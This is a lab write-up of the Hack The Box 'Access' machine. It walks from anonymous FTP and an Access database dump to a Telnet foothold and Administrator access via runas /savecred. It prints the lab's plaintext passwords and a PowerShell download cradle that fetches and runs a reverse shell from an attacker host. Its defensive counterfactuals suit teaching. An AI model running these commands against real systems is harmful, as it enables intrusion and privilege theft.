access

OS: Windows (Server 2008 R2)
Domain / vhosts: none

Summary

Access is a Windows Easy that teaches a clean three-stage credential chain: anonymous FTP exposes a Microsoft Access database, the database yields a password that unlocks a zip file containing an Outlook PST archive, and the PST holds an email with credentials for a Telnet session. The privilege escalation abuses Windows Credential Manager’s /savecred feature — an administrator password was previously cached by a shortcut on the Public Desktop, and any local user can replay it via runas /savecred to run commands as Administrator without knowing the password.

Kill-chain: FTP anonymous → backup.mdb → mdbtools extracts password from auth_user table → unlocks Access Control.zip → readpst reads Access Control.pst → email reveals security account password → Telnet foothold → cmdkey /list reveals cached Administrator credential → runas /savecred executes a Nishang PowerShell reverse shell as Administrator.

The box name is a double pun: the Microsoft Access database format is central to the foothold, and the theme throughout is gaining access via credentials that were left lying around in publicly-accessible locations.

Source attribution

0xdf, “HTB: Access” — https://0xdf.gitlab.io/2019/03/02/htb-access.html. Primary source. Covers the mdbtools enumeration, PST extraction via readpst, the cmdkey /savecred privesc, and the DPAPI alternate path.
IppSec, “Access” video walkthrough — https://ippsec.rocks/?#Access.

Recon

nmap -sT -p- --min-rate 5000 -oA nmap/alltcp <TARGET>
nmap -sV -sC -p 21,23,80 -oA nmap/scripts <TARGET>

21/tcp  open  ftp      Microsoft FTP Service
23/tcp  open  telnet   Microsoft Telnet Service
80/tcp  open  http     Microsoft IIS httpd 7.5

IIS 7.5 fingerprints Windows 7 or Server 2008 R2. No SMB on 445 — this is not a domain-joined host. FTP and Telnet are the entry vectors; HTTP is a dead end (gobuster finds nothing actionable).

FTP enumeration

FTP allows anonymous login. The server accepts EPRT (active mode) for LIST but its PASV/EPSV reply lies (227 Entering Passive Mode (0,0,0,0,…) — IP 0.0.0.0), and the standard Linux ftp client refuses with “Passive mode address mismatch”, aborting binary downloads. curl --ftp-port - forces active mode and works on both the directory listing and the file fetches:

curl --ftp-port - -u anonymous:[email protected] 'ftp://<TARGET>/Backups/backup.mdb' -o backup.mdb
curl --ftp-port - -u anonymous:[email protected] 'ftp://<TARGET>/Engineer/Access%20Control.zip' -o 'Access Control.zip'

backup.mdb is a 5.6 MB Microsoft Access database file. Access Control.zip is a password-protected archive.

MDB extraction — `auth_user` credentials

The mdbtools suite reads Microsoft Access .mdb files on Linux without requiring a Windows host:

# List all non-empty tables
mdb-tables backup.mdb | tr ' ' '\n' | while read t; do
    [ $(mdb-export backup.mdb "$t" | wc -l) -gt 1 ] && echo "$t"
done

The auth_user table contains three accounts:

mdb-export backup.mdb auth_user

id,username,password,Status,...
25,"admin","admin",1,...
27,"engineer","access4u@security",1,...
28,"backup_admin","admin",1,...

The engineer account password doubles as the zip archive password.

PST extraction — Telnet credentials

Unzip with the discovered password:

7z x "Access Control.zip"

The archive contains Access Control.pst, an Outlook Personal Storage file. Convert and read it:

readpst "Access Control.pst"
mutt -Rf "Access Control.mbox"

The mailbox contains a single email from [email protected] stating that the password for the security account has been changed. This yields credentials for the security Windows account.

Foothold — Telnet as `security`

telnet <TARGET>
# login: security  password: <from email>

Welcome to Microsoft Telnet Service
C:\Users\security>whoami
access\security

user.txt is at C:\Users\security\Desktop\user.txt.

Privilege escalation — `cmdkey` / `runas /savecred`

Check cached Windows credentials:

cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

The Administrator credential is cached in Windows Credential Manager. Inspect the Public Desktop to understand how it got there:

C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk

This shortcut invokes runas.exe /user:ACCESS\Administrator /savecred "...". When the Administrator previously used this shortcut, Windows Credential Manager stored the password. The /savecred flag tells runas to read the stored credential rather than prompting — and any local user can invoke it to run commands as Administrator without knowing the password.

If you only need the flag, skip the reverse-shell entirely — runas already executes commands as Administrator, so just have it type the flag into a directory the security Telnet session can read:

runas /user:ACCESS\Administrator /savecred "cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\Public\r.txt"
type C:\Users\Public\r.txt

If you want the interactive shell, the same trick with a download cradle works (Telnet doesn’t need a TTY for the runas call):

runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://<ATTACKER>:8080/shell.ps1')"

In either case the spawned process runs as ACCESS\Administrator:

C:\Users\security>runas … "cmd /c whoami > C:\Users\Public\who.txt"
C:\Users\security>type C:\Users\Public\who.txt
access\administrator

root.txt is at C:\Users\Administrator\Desktop\root.txt.

Why each step worked

Anonymous FTP with sensitive backups: FTP’s anonymous login mode is intended for public file distribution. Storing an internal Access database with user credentials in an FTP directory accessible to anonymous is equivalent to publishing those credentials publicly.
Microsoft Access .mdb readable cross-platform: the .mdb file format is an OLE Compound Document. The open-source mdbtools library implements the format spec and can dump any table without needing Microsoft Access or a Windows host. There is no access control beyond the file itself.
Password reuse: database → zip archive: the engineer password from the database was reused as the zip archive password. The two artifacts were left in different FTP directories, but once the database credential was extracted, the archive opened trivially.
PST as a credential store: .pst files are Outlook mailbox archives. readpst (part of libpst) converts them to standard mbox format readable by mutt or any mail client. Emails routinely contain credentials sent in plaintext (“the new password is…”); a PST left on an accessible share is a credential dump.
Windows Credential Manager + /savecred: runas /savecred tells Windows to check the Credential Manager vault for a cached password and use it without prompting. This is designed for convenience (e.g., a kiosk that needs to run admin tasks without exposing the password). However, once the credential is cached, any process running as any local user can invoke runas /savecred /user:Administrator <cmd> and Windows will supply the cached password automatically. The stored credential is tied to the user profile on disk — it is not protected by the calling user’s identity.

Counterfactuals

Disable anonymous FTP or place backups behind authentication. Sensitive database files should never be accessible to unauthenticated FTP clients.
Rotate all credentials extracted from backup.mdb immediately upon decommissioning that backup. Don’t reuse backup credentials elsewhere.
Never store credentials in email in plaintext. Use a password manager or encrypted channel for credential distribution.
Avoid /savecred for privileged accounts in multi-user environments. If automation requires unattended privileged execution, use a dedicated service account with minimum necessary rights, not the Administrator account.
Disable Telnet in favour of WinRM or RDP with NLA. Telnet transmits all data (including passwords) in plaintext.

Key Takeaways

FTP anonymous login is a reconnaissance priority: any directory listing visible to anonymous is effectively public. Tools like mdbtools, readpst, and 7z allow complete offline analysis of Windows-format files on Linux — no Windows host required.
mdbtools for .mdb files: mdb-tables lists tables; mdb-export dumps table contents as CSV. A credential table in an Access database is identical to a credential dump — treat it the same way.
PST files contain emails, which contain credentials: whenever a PST or .ost file is found, convert it and search for password-containing messages before moving on.
cmdkey /list is the first thing to run on a Windows foothold: if Administrator credentials are cached, runas /savecred is an immediate privesc with no brute force. The presence of a .lnk shortcut using /savecred on a shared Desktop is the signal that the cache was populated.
runas /savecred works from non-interactive shells (Telnet, webshells): unlike runas with a password prompt, /savecred reads from the vault and requires no TTY. Pair it with a download cradle to avoid writing a payload to disk unnecessarily.

References

0xdf, “HTB: Access” — https://0xdf.gitlab.io/2019/03/02/htb-access.html
IppSec, “Access” — https://ippsec.rocks/?#Access
mdbtools — https://github.com/mdbtools/mdbtools
libpst / readpst — PST file conversion utility